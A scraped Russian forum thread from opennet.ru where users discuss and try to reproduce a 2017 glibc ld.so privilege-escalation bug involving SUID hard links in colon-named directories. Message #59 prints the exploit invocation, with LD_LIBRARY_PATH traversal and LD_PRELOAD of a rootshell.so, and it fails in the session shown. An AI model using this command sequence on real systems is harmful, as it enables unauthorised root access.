forum.opennet.ru

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Оглавление

Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..., opennews (??), 12-Дек-17, (0) [смотреть все]

Все на musl Пока чуваки на чёрных вертолётах о нём не прочитали, Аноним (-), 13:34 , 12-Дек-17, (1) –5 //

CVE-2017-15650, CVE-2016-8859, CVE-2015-1817, CVE-2014-3484 - мы работаем над эт, Аноним (-), 14:42 , 12-Дек-17, (11) +4

Ушел пересобирать ядро, Аноним (-), 13:38 , 12-Дек-17, (2) –6 //

дистрибутив пересобери, анонисмус (?), 14:26 , 12-Дек-17, (10) +4
Ещё припарки попробуйте от непонимания , Michael Shigorin (ok), 20:16 , 12-Дек-17, (47) //

А почитать code From Ben Hutchings ben decadent org uk Subject fs Enable l, pavlinux (ok), 17:22 , 13-Дек-17, (64)

Gentoo Linux 4 11 0-pf3glibc 2 26-r3не фурычет уязвимость, Юрий (??), 13:41 , 12-Дек-17, (3) –5 //

Чучка не читатель, чукча писатель В новости черным по белому написано , Аноним (-), 19:19 , 12-Дек-17, (46) +1 //

У него нет времени читать, он компилит же , Аноним (-), 21:08 , 12-Дек-17, (49) +8 //

Не, венду очередной раз переустанавливаю , Юрий (??), 21:39 , 12-Дек-17, (51)

Вот почему некоторые чукчи считают что предложения читать надо до запятой Пробл, Юрий (??), 21:38 , 12-Дек-17, (50) –1 //

Чорд Уязвимость проявляется только если не активна опция proc sys fs protecte, Andrey Mitrofanov (?), 11:23 , 13-Дек-17, (60)

env su No such file or directory , Аноним (-), 13:53 , 12-Дек-17, (5) +1 //

локальный атакующий должен иметь возможность создания жесткой ссылки на испо, Andrey Mitrofanov (?), 14:23 , 12-Дек-17, (9) +5 //

И как тебе рут в данном случае поможет Делай ссылку в tmp, если он у тебя не в, Аноним (-), 15:55 , 12-Дек-17, (19) //

Расходимся, ребят Опять мимо Для справки почти все дистрибутивы держат tmp , Аноним (-), 16:14 , 12-Дек-17, (22) +3

Далеко не все А это вообще крайне редко полагаю, что по умолчанию 8212 вообщ, Аноним (-), 16:47 , 12-Дек-17, (24) –3

Пора bin отдельно монтировать 111, Andrey Mitrofanov (?), 17:01 , 12-Дек-17, (28)
По умолчанию даже netinstall это делает, пока не скажешь делать по другому Хоро, Аноним (-), 17:09 , 12-Дек-17, (33) –1

Нет, не лучше Лучше писать правду , Аноним (-), 17:36 , 12-Дек-17, (39) +2
Debian этого не делает и более того апт сыплет ошибками если tmp смонтирован с , Аноним (-), 01:31 , 13-Дек-17, (54)

Не-не, мне не надо Не надо мне помогать нет, не tmpfs, но да ln не удалось , Andrey Mitrofanov (?), 16:59 , 12-Дек-17, (26)

Ну сделайте вы папочку в хомяке Наверняка же он на одном устройстве с , Аноним (-), 17:38 , 12-Дек-17, (40) –2 //

Красная площадь, б user ln which su ln не удалось создать жёсткую ссылк, Andrey Mitrofanov (?), 17:43 , 12-Дек-17, (43) +1

Это называет руки из жопы Эксплойт нормально запустить не может Ж , Аноним (-), 01:34 , 13-Дек-17, (55) +1

Да-да, конечно-конечно, только не расстраивайся так user ghost mkdir -p cza, Andrey Mitrofanov (?), 11:17 , 13-Дек-17, (59)

Как всегда Уязвимость, которая себя может проявить с вероятностью 0 00000001 Н, Юрий (??), 14:06 , 12-Дек-17, (7) –1
LD_LIBRARY_PATH не игнорируется при suid , Аноним (-), 14:10 , 12-Дек-17, (8) //

сначала парсится, потом игнори уп-с, стек слетел и так у нас все , пох (?), 16:58 , 12-Дек-17, (25) +1

В systemd не пашет , optical character recognition (?), 15:05 , 12-Дек-17, (13) –3 //

В новой версии обещают сделать работоспособной , Anonim (??), 15:09 , 12-Дек-17, (14) +15 //

systemd-exploitd, Аноним (-), 16:17 , 12-Дек-17, (23) +2 //

sex-ploitd Как в соседней микросовтовской про порчу пPокупок , Andrey Mitrofanov (?), 17:04 , 12-Дек-17, (32)

Багу вешайте -- глядишь, исправят , Michael Shigorin (ok), 20:18 , 12-Дек-17, (48) +1

Там ещё этот rootshell so компилять ну его, Аноним (-), 17:43 , 12-Дек-17, (42) –1
c-проблемы гениальных программистов, Аноним (-), 00:57 , 13-Дек-17, (52)
SUID - зло, Влад (??), 01:22 , 13-Дек-17, (53) –1 //

Так есть же linux capabilities , Аноним (-), 09:14 , 13-Дек-17, (57) //

И используются они LD_HWCAP_MASK наверху во добро , Andrey Mitrofanov (?), 11:25 , 13-Дек-17, (61) //

Да, острые ножи требуют аккуратного, вдумчивого и ответственного использования , Аноним (-), 12:28 , 13-Дек-17, (62)

В дебиане и убунте не работает нифига, там protected_hardlinks прописаны , Аноним (-), 03:16 , 13-Дек-17, (56)
у меня в ведре нет , Аноним (-), 10:13 , 13-Дек-17, (58)

Сообщения [Сортировка по времени | RSS]

9. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +5 +/–

Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 14:23

> env: ./su: No such file or directory
> :(
..."локальный атакующий должен иметь возможность создания жесткой ссылки на исполняемый SUID-файл в каталог, содержащий двоеточие в имени."
Делай, как я:
...:/var/tmp/:/lib:/usr/lib:$ ln $(which su) .
ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная ссылка между устройствами
...:/var/tmp/:/lib:/usr/lib:$ _

---Здравствуйте, я зимбабвийский наследный иксплойт. Пож, запустите меня рутом.

Ответить | Правка | Наверх | Cообщить модератору

19. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +/–

Сообщение от Аноним (-), 12-Дек-17, 15:55

> Неверная ссылка между устройствами
> Пож, запустите меня рутом.
И как тебе рут в данном случае поможет? Делай ссылку в /tmp, если он у тебя не в tmpfs, конечно.

Ответить | Правка | Наверх | Cообщить модератору

22. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +3 +/–

Сообщение от Аноним (-), 12-Дек-17, 16:14

> если он у тебя не в tmpfs, конечно.
Расходимся, ребят. Опять мимо :(
Для справки: почти все дистрибутивы держат /tmp в tmpfs и более того, он noexec.

Ответить | Правка | Наверх | Cообщить модератору

24. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." –3 +/–

Сообщение от Аноним (-), 12-Дек-17, 16:47

> почти все дистрибутивы держат /tmp в tmpfs
Далеко не все.
> более того, он noexec
А это вообще крайне редко (полагаю, что по умолчанию — вообще нигде).
В случае чего есть ещё /var/tmp. Можешь начинать рассказывать, что у тебя и /var отдельно смонтирован.

Ответить | Правка | Наверх | Cообщить модератору

28. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +/–

Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 17:01

> В случае чего есть ещё /var/tmp. Можешь начинать рассказывать, что у тебя
> и /var отдельно смонтирован.
Пора /bin отдельно монтировать!!111

Ответить | Правка | Наверх | Cообщить модератору

33. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." –1 +/–

Сообщение от Аноним (-), 12-Дек-17, 17:09

> Можешь начинать рассказывать, что у тебя
> и /var отдельно смонтирован.
По умолчанию даже netinstall это делает, пока не скажешь делать по другому. Хорошо, все крупные дистрибутивы это делают, в том числе Debian. Так лучше?

Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

39. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +2 +/–

Сообщение от Аноним (-), 12-Дек-17, 17:36

> Хорошо, все крупные дистрибутивы это делают, в том числе Debian. Так лучше?
Нет, не лучше. Лучше писать правду.

Ответить | Правка | Наверх | Cообщить модератору

54. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +/–

Сообщение от Аноним (-), 13-Дек-17, 01:31

Debian этого не делает и более того апт сыплет ошибками если /tmp смонтирован с noexec

Ответить | Правка | К родителю #33 | Наверх | Cообщить модератору

26. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +/–

Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 16:59

>> Неверная ссылка между устройствами
>> Пож, запустите меня рутом.
> И как тебе рут в данном случае поможет? Делай ссылку в /tmp,
> если он у тебя не в tmpfs, конечно.
Не-не, мне не надо. Не надо мне помогать.
...нет, не tmpfs, но да:
ln: не удалось создать жёсткую ссылку «/tmp/su» => «/bin/su»: Неверная ссылка между устройствами

Ответить | Правка | К родителю #19 | Наверх | Cообщить модератору

40. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." –2 +/–

Сообщение от Аноним (-), 12-Дек-17, 17:38

Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве с /

Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

43. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +1 +/–

Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 17:43

> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве
> с /
Красная площадь, б.!

user:~$ ln $(which su) .
ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная ссылка между устройствами
user:~$ _

Ответить | Правка | Наверх | Cообщить модератору

55. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +1 +/–

Сообщение от Аноним (-), 13-Дек-17, 01:34

>> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве
>> с /
> Красная площадь, б.!
> user:~$ ln $(which su) .
> ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная
> ссылка между устройствами
> user:~$ _
Это называет "руки из жопы". Эксплойт нормально запустить не может! Ж)

Ответить | Правка | Наверх | Cообщить модератору

59. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..." +/–

Сообщение от Andrey Mitrofanov (?), 13-Дек-17, 11:17

>>> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве
>>> с /
>> Красная площадь, б.!
>> user:~$ ln $(which su) .
>> ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная
>> ссылка между устройствами
>> user:~$ _
> Это называет "руки из жопы". Эксплойт нормально запустить не может! Ж)
Да-да, конечно-конечно, только не расстраивайся так.
user@ghost:~$ mkdir -p '/czar/tmp/:/lib:/usr/lib:'
user@ghost:~$ find /czar/tmp/
/czar/tmp/
/czar/tmp/:
/czar/tmp/:/lib:
/czar/tmp/:/lib:/usr
/czar/tmp/:/lib:/usr/lib:
user@ghost:~$ cd '/czar/tmp/:/lib:/usr/lib:'
user@ghost:/czar/tmp/:/lib:/usr/lib:$ ln $(wich su) .
bash: wich: команда не найдена
ln: «.»: не допускается создавать жёсткие ссылки на каталоги
user@ghost:/czar/tmp/:/lib:/usr/lib:$ ln $(which su) .
ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Операция не позволяется
.
.
.
root@novy:/czar/tmp/:/lib:/usr/lib:# ln $(which su) .
root@novy:/czar/tmp/:/lib:/usr/lib:# _
.
.
.
user@ghost:/czar/tmp/:/lib:/usr/lib:$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su
ERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded: ignored.
ERROR: ld.so: object 'rootshell.so' from LD_PRELOAD cannot be preloaded: ignored.
Password: _

Не быть мне хаксором. Как бы вам :-P этого ни хотелось.

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру


	9. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+5 +/–
	Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 14:23
	> env: ./su: No such file or directory > :( ..."локальный атакующий должен иметь возможность создания жесткой ссылки на исполняемый SUID-файл в каталог, содержащий двоеточие в имени." Делай, как я: ...:/var/tmp/:/lib:/usr/lib:$ ln $(which su) . ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная ссылка между устройствами ...:/var/tmp/:/lib:/usr/lib:$ _ ---Здравствуйте, я зимбабвийский наследный иксплойт. Пож, запустите меня рутом.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	19. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+/–
	Сообщение от Аноним (-), 12-Дек-17, 15:55
	> Неверная ссылка между устройствами > Пож, запустите меня рутом. И как тебе рут в данном случае поможет? Делай ссылку в /tmp, если он у тебя не в tmpfs, конечно.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	22. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+3 +/–
	Сообщение от Аноним (-), 12-Дек-17, 16:14
	> если он у тебя не в tmpfs, конечно. Расходимся, ребят. Опять мимо :( Для справки: почти все дистрибутивы держат /tmp в tmpfs и более того, он noexec.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	24. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	–3 +/–
	Сообщение от Аноним (-), 12-Дек-17, 16:47
	> почти все дистрибутивы держат /tmp в tmpfs Далеко не все. > более того, он noexec А это вообще крайне редко (полагаю, что по умолчанию — вообще нигде). В случае чего есть ещё /var/tmp. Можешь начинать рассказывать, что у тебя и /var отдельно смонтирован.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	28. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+/–
	Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 17:01
	> В случае чего есть ещё /var/tmp. Можешь начинать рассказывать, что у тебя > и /var отдельно смонтирован. Пора /bin отдельно монтировать!!111
	Ответить \| Правка \| Наверх \| Cообщить модератору


	33. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	–1 +/–
	Сообщение от Аноним (-), 12-Дек-17, 17:09
	> Можешь начинать рассказывать, что у тебя > и /var отдельно смонтирован. По умолчанию даже netinstall это делает, пока не скажешь делать по другому. Хорошо, все крупные дистрибутивы это делают, в том числе Debian. Так лучше?
	Ответить \| Правка \| К родителю #24 \| Наверх \| Cообщить модератору


	39. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+2 +/–
	Сообщение от Аноним (-), 12-Дек-17, 17:36
	> Хорошо, все крупные дистрибутивы это делают, в том числе Debian. Так лучше? Нет, не лучше. Лучше писать правду.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	54. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+/–
	Сообщение от Аноним (-), 13-Дек-17, 01:31
	Debian этого не делает и более того апт сыплет ошибками если /tmp смонтирован с noexec
	Ответить \| Правка \| К родителю #33 \| Наверх \| Cообщить модератору


	26. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+/–
	Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 16:59
	>> Неверная ссылка между устройствами >> Пож, запустите меня рутом. > И как тебе рут в данном случае поможет? Делай ссылку в /tmp, > если он у тебя не в tmpfs, конечно. Не-не, мне не надо. Не надо мне помогать. ...нет, не tmpfs, но да: ln: не удалось создать жёсткую ссылку «/tmp/su» => «/bin/su»: Неверная ссылка между устройствами
	Ответить \| Правка \| К родителю #19 \| Наверх \| Cообщить модератору


	40. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	–2 +/–
	Сообщение от Аноним (-), 12-Дек-17, 17:38
	Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве с /
	Ответить \| Правка \| К родителю #9 \| Наверх \| Cообщить модератору


	43. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+1 +/–
	Сообщение от Andrey Mitrofanov (?), 12-Дек-17, 17:43
	> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве > с / Красная площадь, б.! user:~$ ln $(which su) . ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная ссылка между устройствами user:~$ _
	Ответить \| Правка \| Наверх \| Cообщить модератору


	55. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+1 +/–
	Сообщение от Аноним (-), 13-Дек-17, 01:34
	>> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве >> с / > Красная площадь, б.! > user:~$ ln $(which su) . > ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная > ссылка между устройствами > user:~$ _ Это называет "руки из жопы". Эксплойт нормально запустить не может! Ж)
	Ответить \| Правка \| Наверх \| Cообщить модератору


	59. "Уязвимость в Glibc ld.so, позволяющая поднять свои привилеги..."	+/–
	Сообщение от Andrey Mitrofanov (?), 13-Дек-17, 11:17
	>>> Ну сделайте вы папочку в хомяке. Наверняка же он на одном устройстве >>> с / >> Красная площадь, б.! >> user:~$ ln $(which su) . >> ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Неверная >> ссылка между устройствами >> user:~$ _ > Это называет "руки из жопы". Эксплойт нормально запустить не может! Ж) Да-да, конечно-конечно, только не расстраивайся так. user@ghost:~$ mkdir -p '/czar/tmp/:/lib:/usr/lib:' user@ghost:~$ find /czar/tmp/ /czar/tmp/ /czar/tmp/: /czar/tmp/:/lib: /czar/tmp/:/lib:/usr /czar/tmp/:/lib:/usr/lib: user@ghost:~$ cd '/czar/tmp/:/lib:/usr/lib:' user@ghost:/czar/tmp/:/lib:/usr/lib:$ ln $(wich su) . bash: wich: команда не найдена ln: «.»: не допускается создавать жёсткие ссылки на каталоги user@ghost:/czar/tmp/:/lib:/usr/lib:$ ln $(which su) . ln: не удалось создать жёсткую ссылку «./su» => «/bin/su»: Операция не позволяется . . . root@novy:/czar/tmp/:/lib:/usr/lib:# ln $(which su) . root@novy:/czar/tmp/:/lib:/usr/lib:# _ . . . user@ghost:/czar/tmp/:/lib:/usr/lib:$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK="$(((1<<25)-1))" ./su ERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded: ignored. ERROR: ld.so: object 'rootshell.so' from LD_PRELOAD cannot be preloaded: ignored. Password: _ Не быть мне хаксором. Как бы вам :-P этого ни хотелось.
	Ответить \| Правка \| Наверх \| Cообщить модератору